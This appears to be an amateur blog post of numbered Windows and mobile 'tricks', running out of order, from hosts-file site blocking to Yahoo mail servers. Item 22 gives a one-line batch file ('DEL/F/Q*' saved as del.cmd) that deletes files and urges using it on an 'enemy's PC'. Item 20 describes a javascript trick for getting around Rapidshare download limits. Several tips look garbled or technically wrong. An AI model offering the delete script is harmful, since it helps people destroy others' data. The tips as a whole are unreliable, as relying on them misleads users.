This is my fourth post in the particular section where I hope you might have gained lot of information as well as short cuts in you day to day Techno life. 1. Wanna watch Television on your mobile ? Then Download TV2GO application here http://m.togo.tv

2. Check the errors in your Windows powered computer. Go to Start menu -> Run -> type SFC and correct them all.

3. Wanna edit your Windows firewall settings. Goto Start menu -> Run -> type FIREW and change them accordingly.

4. Do you wanna lock a website on your computer ?

-> Goto C:\Windows\system32\drivers\etc

-> Find a file named HOSTS

-> Open with notepad and under the line 127.0.0.1 local host add another line as 127.0.0.2 www.xyz.com

-> xyz is the site you wanna block and save the file.

5. Yahoo mail outgoing and incoming server address

Outgoing mail server address : smtp.mail.yahoo.co.in

Incoming mail server address : pop.mail.yahoo.co.in

18. Create a Web2.0 logo in your mobile itself . Visit http://www.cooltext.com and do it online . No software needed to be downloaded.

19. Brosing from your mobile phone and wanna cut some KBs ? Convert a website to a wapsite , a minimised version of the original one. Visit http://www.skweezer.com

20. Don’t have a Premium Rapidshare account but are a download freak ? Dont’ worry . Use unlimited Rapidshare

-> Go to the page you wanna doenload

-> Select FREE button

->In address bar put the javascript: alert(c=0)

-> Click OK in the pop-up box.

21. Have a USB drive full of viruses but don’t have a Lisence version of an Anti-Virus ? Just plugin the USB drive into a Linux Operating System and remove autorun.inf file or any unwanted files. You are done.

22. Delete all the files on a hard disk running a simple file

-> take notepad

-> type DEL/F/Q*

-> save as del.cmd

WARNING  : Use this trick on your enemy’s PC only.

14. Bored with those monotonous looking icons ?? Create your own in minutes;

-> Go to Paint

-> Select the image for your icon

-> Resize the image to 32 x 32 pixels and save it as ‘you-filename’.ico , Remember the extension should be .ico and replace the icons you wanna change.

15.  Are you addicted to You Tube but donot have a PC internet ?? No problem , watch  it on your mobile phone . Just visit http://vuclip.com

16.  Do you own a NOKIA phone and its locked ?? Get NOKIA master code using your IMEI number. Visit http://nokialockcode.com/mastercode/php

17.  Here’s a rare trick to change your Windows XP password.

-> Go to start menu - Run and type ‘cmd’ . ENTER

-> Type ‘net user <your desired Username>’

-> Ask for New Password.

-> type your password and confirm it.
